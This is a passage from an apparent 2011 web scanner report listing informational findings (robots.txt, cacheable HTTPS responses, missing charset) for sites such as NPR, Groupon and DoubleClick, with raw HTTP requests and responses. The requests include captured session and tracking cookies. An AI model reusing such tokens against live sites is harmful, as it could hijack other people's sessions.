Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

22.60. http://www.natchezdemocrat.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.natchezdemocrat.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.natchezdemocrat.com

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:37:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: W3 Total Cache/0.9.1.1
X-Pingback: http://www.natchezdemocrat.com/xmlrpc.php
Set-Cookie: PHPSESSID=d16vlf5l6uc0pe36hli1cb0t80; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

22.61. http://www.npr.org/templates/reg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 Jul 2004 21:14:03 GMT
ETag: "ee-3dfc0e1ac1cc0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 20:09:42 GMT
Keep-Alive: timeout=10, max=4993
Content-Type: text/plain
Connection: close
Date: Mon, 09 May 2011 15:39:46 GMT
Age: 204
Content-Length: 238

User-agent: *
Disallow: /cgi-bin
Disallow: /ramfiles/
Disallow: /*.smil
Disallow: /*.asx
Disallow: /*.ram
Disallow: /*.rmm
Disallow: /*.js
Disallow: /*.au
Disallow: /stations/force/force_localization.
...[SNIP]...

22.62. http://www.tinbuadserv.com/v3/serve.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /v3/serve.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tinbuadserv.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:41 GMT
Server: Apache
Last-Modified: Wed, 17 Feb 2010 17:20:06 GMT
ETag: "16e8aab-86-47fcf0fbf5d80"
Accept-Ranges: bytes
Content-Length: 134
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# This robots.txt file requests search engines and other bots stay away and dont follow advertising links.
User-agent: *
Disallow: /

22.63. http://www.usatoday.com/weather/stormcenter/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /weather/stormcenter/default.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

23. Cacheable HTTPS response  previous  next
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


23.1. https://shop.npr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.npr.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:44:22 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: text/plain
Content-Length: 318

..............(.......(....... ...............................................................................................................................    .......    .......    .......    .......    .......    .
...[SNIP]...

23.2. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

23.3. https://www.groupon.com/users/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

24. HTML does not specify charset  previous  next
There are 27 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

24.2. http://480-adver-view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...

24.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:40 GMT
Expires: Mon, 09 May 2011 15:37:40 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:13 GMT
Expires: Mon, 09 May 2011 15:35:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5834
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:17 GMT
Expires: Mon, 09 May 2011 15:36:17 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.6. http://ad.doubleclick.net/pfadx/csmonitor_cim/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;~cs=w
Date: Mon, 09 May 2011 15:35:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1217

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

24.7. http://ads.bridgetrack.com/a/f/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:41 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
